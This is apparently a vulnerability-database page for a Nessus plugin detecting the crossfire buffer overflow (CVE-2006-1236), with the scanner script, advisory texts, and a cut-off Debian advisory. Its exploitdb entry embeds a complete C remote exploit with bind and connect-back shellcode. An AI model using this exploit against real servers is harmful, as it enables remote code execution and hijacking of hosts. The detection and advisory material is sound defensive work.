Search...

Debian DSA-1009-1 : crossfire - buffer overflow

2006-10-14T00:00:00

ID DEBIAN_DSA-1009.NASL
Type nessus
Reporter This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.
Modified 2006-10-14T00:00:00

Description

A buffer overflow has been discovered in the crossfire game which allows remote attackers to execute arbitrary code.

                                        
                                            #%NASL_MIN_LEVEL 70300

#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from Debian Security Advisory DSA-1009. The text 
# itself is copyright (C) Software in the Public Interest, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(22551);
  script_version("1.17");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/04");

  script_cve_id("CVE-2006-1236");
  script_xref(name:"DSA", value:"1009");

  script_name(english:"Debian DSA-1009-1 : crossfire - buffer overflow");
  script_summary(english:"Checks dpkg output for the updated package");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote Debian host is missing a security-related update."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"A buffer overflow has been discovered in the crossfire game which
allows remote attackers to execute arbitrary code."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.debian.org/security/2006/dsa-1009"
  );
  script_set_attribute(
    attribute:"solution", 
    value:
"Upgrade the crossfire package.

For the old stable distribution (woody) this problem has been fixed in
version 1.1.0-1woody2.

For the stable distribution (sarge) this problem has been fixed in
version 1.6.0.dfsg.1-4sarge2."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:crossfire");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.0");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.1");

  script_set_attribute(attribute:"patch_publication_date", value:"2006/03/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/10/14");
  script_set_attribute(attribute:"vuln_publication_date", value:"2006/03/13");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.");
  script_family(english:"Debian Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");

  exit(0);
}


include("audit.inc");
include("debian_package.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;
if (deb_check(release:"3.0", prefix:"crossfire-doc", reference:"1.1.0-1woody2")) flag++;
if (deb_check(release:"3.0", prefix:"crossfire-edit", reference:"1.1.0-1woody2")) flag++;
if (deb_check(release:"3.0", prefix:"crossfire-server", reference:"1.1.0-1woody2")) flag++;
if (deb_check(release:"3.1", prefix:"crossfire-doc", reference:"1.6.0.dfsg.1-4sarge2")) flag++;
if (deb_check(release:"3.1", prefix:"crossfire-edit", reference:"1.6.0.dfsg.1-4sarge2")) flag++;
if (deb_check(release:"3.1", prefix:"crossfire-server", reference:"1.6.0.dfsg.1-4sarge2")) flag++;

if (flag)
{
  if (report_verbosity &gt; 0) security_hole(port:0, extra:deb_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

JSON Vulners Source

Initial Source

{"id": "DEBIAN_DSA-1009.NASL", "bulletinFamily": "scanner", "title": "Debian DSA-1009-1 : crossfire - buffer overflow", "description": "A buffer overflow has been discovered in the crossfire game which\nallows remote attackers to execute arbitrary code.", "published": "2006-10-14T00:00:00", "modified": "2006-10-14T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/22551", "reporter": "This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.", "references": ["http://www.debian.org/security/2006/dsa-1009"], "cvelist": ["CVE-2006-1236"], "type": "nessus", "lastseen": "2021-01-06T09:44:31", "edition": 25, "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-1236"]}, {"type": "osvdb", "idList": ["OSVDB:23904"]}, {"type": "openvas", "idList": ["OPENVAS:56461"]}, {"type": "exploitdb", "idList": ["EDB-ID:1582"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1009-1:1A76A"]}], "modified": "2021-01-06T09:44:31", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-01-06T09:44:31", "rev": 2}, "vulnersScore": 7.1}, "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1009. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22551);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-1236\");\n script_xref(name:\"DSA\", value:\"1009\");\n\n script_name(english:\"Debian DSA-1009-1 : crossfire - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow has been discovered in the crossfire game which\nallows remote attackers to execute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1009\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the crossfire package.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.1.0-1woody2.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 1.6.0.dfsg.1-4sarge2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:crossfire\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/03/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"crossfire-doc\", reference:\"1.1.0-1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"crossfire-edit\", reference:\"1.1.0-1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"crossfire-server\", reference:\"1.1.0-1woody2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"crossfire-doc\", reference:\"1.6.0.dfsg.1-4sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"crossfire-edit\", reference:\"1.6.0.dfsg.1-4sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"crossfire-server\", reference:\"1.6.0.dfsg.1-4sarge2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "pluginID": "22551", "cpe": ["cpe:/o:debian:debian_linux:3.1", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:crossfire"], "scheme": null}

{"cve": [{"lastseen": "2020-10-03T11:48:13", "description": "Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command, a different vulnerability than CVE-2006-1010.", "edition": 3, "cvss3": {}, "published": "2006-03-15T00:02:00", "title": "CVE-2006-1236", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2006-1236"], "modified": "2017-10-11T01:30:00", "cpe": ["cpe:/a:crossfire:crossfire:1.9.0"], "id": "CVE-2006-1236", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1236", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:crossfire:crossfire:1.9.0:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:20", "bulletinFamily": "software", "cvelist": ["CVE-2006-1236"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in CrossFire. CrossFire fails to properly handle boundary conditions within the SetUp() function in \"request.c\" when handling malicious content received in the \"setup\" command resulting in a stack-based buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Crossfire has released a patch to address this vulnerability. Upgrade the \"request.c\" file to at least version 1.86\n## Short Description\nA remote overflow exists in CrossFire. CrossFire fails to properly handle boundary conditions within the SetUp() function in \"request.c\" when handling malicious content received in the \"setup\" command resulting in a stack-based buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://crossfire.real-time.com/index.html\nVendor Specific News/Changelog Entry: http://cvs.sourceforge.net/viewcvs.py/crossfire/crossfire/socket/request.c?rev=1.86&view=log\n[Vendor Specific Advisory URL](http://www.debian.org/security/2006/dsa-1009)\n[Secunia Advisory ID:19237](https://secuniaresearch.flexerasoftware.com/advisories/19237/)\n[Secunia Advisory ID:19276](https://secuniaresearch.flexerasoftware.com/advisories/19276/)\nISS X-Force ID: 25252\nGeneric Exploit URL: http://www.milw0rm.com/exploits/1582\nFrSIRT Advisory: ADV-2006-0951\n[CVE-2006-1236](https://vulners.com/cve/CVE-2006-1236)\nBugtraq ID: 17093\n", "modified": "2006-03-13T13:17:36", "published": "2006-03-13T13:17:36", "href": "https://vulners.com/osvdb/OSVDB:23904", "id": "OSVDB:23904", "title": "CrossFire request.c SetUp() Function Remote Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:49:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1236"], "description": "The remote host is missing an update to crossfire\nannounced via advisory DSA 1009-1.\n\nA buffer overflow has been discovered in the crossfire game which\nallows remote attackers to execute arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.1.0-1woody2.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:56461", "href": "http://plugins.openvas.org/nasl.php?oid=56461", "type": "openvas", "title": "Debian Security Advisory DSA 1009-1 (crossfire)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1009_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1009-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 1.6.0.dfsg.1-4sarge2.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 1.9.0-2.\n\nWe recommend that you upgrade your crossfire package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201009-1\";\ntag_summary = \"The remote host is missing an update to crossfire\nannounced via advisory DSA 1009-1.\n\nA buffer overflow has been discovered in the crossfire game which\nallows remote attackers to execute arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.1.0-1woody2.\";\n\n\nif(description)\n{\n script_id(56461);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:09:45 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(17093);\n script_cve_id(\"CVE-2006-1236\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1009-1 (crossfire)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"crossfire-doc\", ver:\"1.1.0-1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"crossfire-edit\", ver:\"1.1.0-1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"crossfire-server\", ver:\"1.1.0-1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"crossfire-doc\", ver:\"1.6.0.dfsg.1-4sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"crossfire-edit\", ver:\"1.6.0.dfsg.1-4sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"crossfire-server\", ver:\"1.6.0.dfsg.1-4sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T14:29:18", "description": "crossfire-server. CVE-2006-1236. Remote exploit for linux platform", "published": "2006-03-13T00:00:00", "type": "exploitdb", "title": "crossfire-server <= 1.9.0 - SetUp Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-1236"], "modified": "2006-03-13T00:00:00", "id": "EDB-ID:1582", "href": "https://www.exploit-db.com/exploits/1582/", "sourceData": "// crossfire-server <= 1.9.0 \"SetUp()\" remote buffer overflow\r\n//\r\n// exploit by landser - ihsahn at gmail com\r\n// vote http://shinui.org.il\r\n//\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <arpa/inet.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netdb.h>\r\n\r\n#define PORT 13327 // default port\r\n#define SC_PORT 33333 // default shellcode port\r\n#define SC_HOST \"127.0.0.1\" // default shellcode host\r\n\r\nunsigned char sc_cb[] = // izik's\r\n\t\"\\x6a\\x66\\x58\\x99\\x6a\\x01\\x5b\\x52\\x53\\x6a\\x02\\x89\\xe1\\xcd\"\r\n\t\"\\x80\\x5b\\x5d\\xbeHOST\\xf7\\xd6\\x56\\x66\\xbdPR\\x0f\\xcd\\x09\\xdd\"\r\n\t\"\\x55\\x43\\x6a\\x10\\x51\\x50\\xb0\\x66\\x89\\xe1\\xcd\\x80\\x87\\xd9\"\r\n\t\"\\x5b\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\xb0\\x0b\\x52\\x68\\x2f\\x2f\"\r\n\t\"\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\\xeb\\xdf\";\r\n\r\nunsigned char sc_bind[] = // izik's\r\n\t\"\\x6a\\x66\\x58\\x99\\x6a\\x01\\x5b\\x52\\x53\\x6a\\x02\\x89\\xe1\\xcd\"\r\n\t\"\\x80\\x5b\\x5d\\x52\\x66\\xbdPR\\x0f\\xcd\\x09\\xdd\\x55\\x6a\\x10\\x51\"\r\n\t\"\\x50\\x89\\xe1\\xb0\\x66\\xcd\\x80\\xb3\\x04\\xb0\\x66\\xcd\\x80\\x5f\"\r\n\t\"\\x50\\x50\\x57\\x89\\xe1\\x43\\xb0\\x66\\xcd\\x80\\x93\\xb0\\x02\\xcd\"\r\n\t\"\\x80\\x85\\xc0\\x75\\x1a\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\xb0\"\r\n\t\"\\x0b\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\"\r\n\t\"\\x53\\xeb\\xb2\\x6a\\x06\\x58\\xcd\\x80\\xb3\\x04\\xeb\\xc9\";\r\n\r\nstruct {\r\n\tconst char *type;\r\n\tunsigned char *code;\r\n} shellcodes[] = {\r\n\t{\"bind\",\t\tsc_bind},\r\n\t{\"connectback\",\t\tsc_cb},\r\n};\r\n\r\nstruct {\r\n\tconst char *ver;\r\n\tunsigned long ret; // a \"jmp *%eax\" instruction\r\n\tunsigned short int len;\r\n} targets[] = {\r\n\t{\"crossfire-server_1.6.0.dfsg.1-4_i386.deb\",\t0x080d6f48, 0x1028},\r\n\t{\"crossfire-server_1.8.0-2_i386.deb\",\t\t0x080506d7, 0x1130},\r\n\t{\"crossfire-server_1.9.0-1_i386.deb\",\t\t0x0807aefa, 0x1130},\r\n\t{\"crash\",\t\t\t\t\t0xcccccccc, 0x1300},\r\n};\r\n\r\n#define structsize(x) (sizeof x / sizeof x[0])\r\n\r\nint s;\r\nint n = -1;\r\nunsigned char *sc = sc_bind; // default shellcode\r\nunsigned char buf[0x2000];\r\n\r\nvoid establish (char *, int);\r\nvoid usage (char *);\r\nvoid update (unsigned char *, int, char *);\r\nvoid writebuf (void);\r\n\r\nint main (int argc, char **argv) {\r\n\tint port = 0; // default value\r\n\tunsigned short int sc_port = 0;\r\n\tchar *sc_host = NULL;\r\n\r\n\tprintf(\"cf190.c by landser - ihsahn at gmail com\\n\\n\");\r\n\r\n\tchar c;\r\n\twhile ((c = getopt(argc, argv, \"t:p:h:d:s:\")) != -1) {\r\n\t\tswitch (c) {\r\n\t\t\tcase 's': sc = shellcodes[atoi(optarg)].code; break;\r\n\t\t\tcase 'h': sc_host = strdup(optarg); break;\r\n\t\t\tcase 'd': sc_port = atoi(optarg); break;\r\n\t\t\tcase 't': n = atoi(optarg); break;\r\n\t\t\tcase 'p': port = atoi(optarg); break;\r\n\t\t\tcase '?': usage(argv[0]); return EXIT_FAILURE;\r\n\t\t}\r\n\t}\r\n\r\n\tif ((n < 0) || (n >= structsize(targets))) {\r\n\t\tprintf(\"invalid target\\n\");\r\n\t\tusage(argv[0]);\r\n\t\treturn EXIT_FAILURE;\r\n\t}\r\n\t\r\n\tif ((optind + 1) != argc) {\r\n\t\tprintf(\"no hostname\\n\");\r\n\t\tusage(argv[0]);\r\n\t\treturn EXIT_FAILURE;\r\n\t}\r\n\r\n\testablish(argv[optind], port ? port : PORT);\r\n\t\r\n\tupdate(sc, sc_port, sc_host);\r\n \r\n\twritebuf();\r\n\r\n\tprintf(\"> sending\\n\");\r\n\r\n\tif (send(s, buf, targets[n].len + 2, 0) < 0) {\r\n\t\tperror(\"send()\");\r\n\t\treturn EXIT_FAILURE;\r\n\t}\r\n\tusleep(100000);\r\n\r\n\tprintf(\"> done\\n\");\r\n\t\r\n\tclose(s);\r\n\r\n\treturn EXIT_SUCCESS;\r\n}\r\n\r\nvoid establish (char *ip, int port) {\r\n\tstruct sockaddr_in sa;\r\n\tstruct hostent *h;\r\n\r\n\tif (!(h = gethostbyname(ip))) {\r\n\t\therror(\"gethostbyname()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tprintf(\"> resolved %s to %s\\n\", ip,\r\n\t\t\tinet_ntoa(**((struct in_addr **)h->h_addr_list)));\r\n\t\r\n\tsa.sin_family = AF_INET;\r\n\tsa.sin_port = htons(port);\r\n\tsa.sin_addr = **((struct in_addr **)h->h_addr_list);\r\n\t\r\n\tif ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {\r\n\t\tperror(\"socket()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (connect(s, (struct sockaddr *)&sa, sizeof(struct sockaddr)) < 0) {\r\n\t\tperror(\"connect()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tprintf (\"> connected to %s:%d.\\n\", inet_ntoa(**((struct in_addr **)h->h_addr_list)), port);\r\n}\r\n\r\nvoid usage (char *argv0) {\r\n\tint i;\r\n\t\r\n\tprintf(\"usage: %s -t <target> [-s <shellcode>] \"\r\n\t\t\t\"[-d <connectback/bind port] [-h <connectback ip>] \"\r\n\t\t\t\"host [-p <port>]\\n\", argv0);\r\n\r\n\tprintf(\"- targets:\\n\");\r\n\tfor (i=0;i<structsize(targets);i++)\r\n\t\tprintf(\"%d. %s\\n\", i, targets[i].ver);\r\n\r\n\tprintf(\"- shellcodes: (default 0)\\n\");\r\n\tfor (i=0;i<structsize(shellcodes);i++)\r\n\t\tprintf(\"%d. %s\\n\", i, shellcodes[i].type);\r\n}\r\n\r\nvoid update (unsigned char *code, int port, char *host) {\r\n\tif (!port) port = SC_PORT;\r\n\t\r\n\tif (!(port & 0xff) || !((port >> 8) & 0xff)) {\r\n\t\tprintf(\"bad cb port\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\t*(unsigned short int *)(strstr(code, \"PR\")) = port;\r\n\r\n\tif (strstr(code, \"HOST\")) {\r\n\t\tin_addr_t inaddr;\r\n\r\n\t\tif (!host) host = SC_HOST;\r\n\t\tinaddr = inet_addr(host);\r\n\t\t\r\n\t\tif (inaddr == INADDR_NONE || strstr(host, \"255\")) {\r\n\t\t\t// ~(255) is 0\r\n\t\t\tprintf(\"invalid cb hostname\\n\");\r\n\t\t\texit(EXIT_FAILURE);\r\n\t\t}\r\n\t\t*(in_addr_t *)(strstr(code, \"HOST\")) = ~inaddr;\r\n\t}\r\n\t\r\n\tif (host) free(host);\r\n}\r\n\t\r\nvoid writebuf (void) {\r\n\tunsigned char *ptr = buf;\r\n\t\r\n\tmemset(buf, 0x90, sizeof buf);\r\n\r\n\t*ptr++ = (targets[n].len>> 8) & 0xff;\r\n\t*ptr++ = targets[n].len & 0xff;\r\n\t\r\n\tmemcpy(ptr, \"setup sound \", strlen(\"setup sound \"));\r\n\tptr += strlen(\"setup sound \");\r\n\t\r\n\tptr += 120; // leave 120 nops before the shellcode\r\n\tmemcpy(ptr, sc, strlen(sc));\r\n\t\r\n\tptr = &buf[targets[n].len - 10];\r\n\t*(unsigned long *)ptr = targets[n].ret;\r\n}\r\n\r\n// milw0rm.com [2006-03-13]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1582/"}], "debian": [{"lastseen": "2020-11-11T13:16:37", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1236"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1009-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nMarch 21st, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : crossfire\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2006-1236\n\nA buffer overflow has been discovered in the crossfire game which\nallows remote attackers to execute arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.1.0-1woody2.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 1.6.0.dfsg.1-4sarge2.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 1.9.0-2.\n\nWe recommend that you upgrade your crossfire package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire_1.1.0-1woody2.dsc\n Size/MD5 checksum: 648 c87ae4538c9f9ce8af57fddcdddf3c9e\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire_1.1.0-1woody2.diff.gz\n Size/MD5 checksum: 47426 6b0532a7a8748e3e5a5d81dc25350d13\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire_1.1.0.orig.tar.gz\n Size/MD5 checksum: 3057431 824e6d9a91ee0321629a9e99ad4e264f\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-doc_1.1.0-1woody2_all.deb\n Size/MD5 checksum: 584480 1c75de6980f66906bd52fbca399e2857\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_alpha.deb\n Size/MD5 checksum: 193802 a932826e54d713e18d5393e9036fda02\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_alpha.deb\n Size/MD5 checksum: 2097946 e9dca904054c7fcf5bcf29e294ad333b\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_arm.deb\n Size/MD5 checksum: 156404 89d0da5ac8daffb2e6e064a9eb84fe8b\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_arm.deb\n Size/MD5 checksum: 1994212 f4ce8a9b872dd465f748ce2e706801e4\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_i386.deb\n Size/MD5 checksum: 141220 5f5913df2c1a253d1b4d23ef91877712\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_i386.deb\n Size/MD5 checksum: 1954014 9c1c622d75f4a1125c74e7910a9a1842\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_ia64.deb\n Size/MD5 checksum: 243816 97e96103f5b19a73963a14041f12d141\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_ia64.deb\n Size/MD5 checksum: 2224064 1b392240b1de7ef6cc5656a0244d45b0\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_hppa.deb\n Size/MD5 checksum: 175634 52f5ff61bc7c8eeab9aef678ccd023b0\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_hppa.deb\n Size/MD5 checksum: 2047990 ae204aed290fe71f37f2fd8693c1acb3\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_m68k.deb\n Size/MD5 checksum: 131890 3470c9b54fa4afe91af8d855260756f9\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_m68k.deb\n Size/MD5 checksum: 1925486 b0057f324e5faafec58416264d42e423\n\n Big endian MIPS 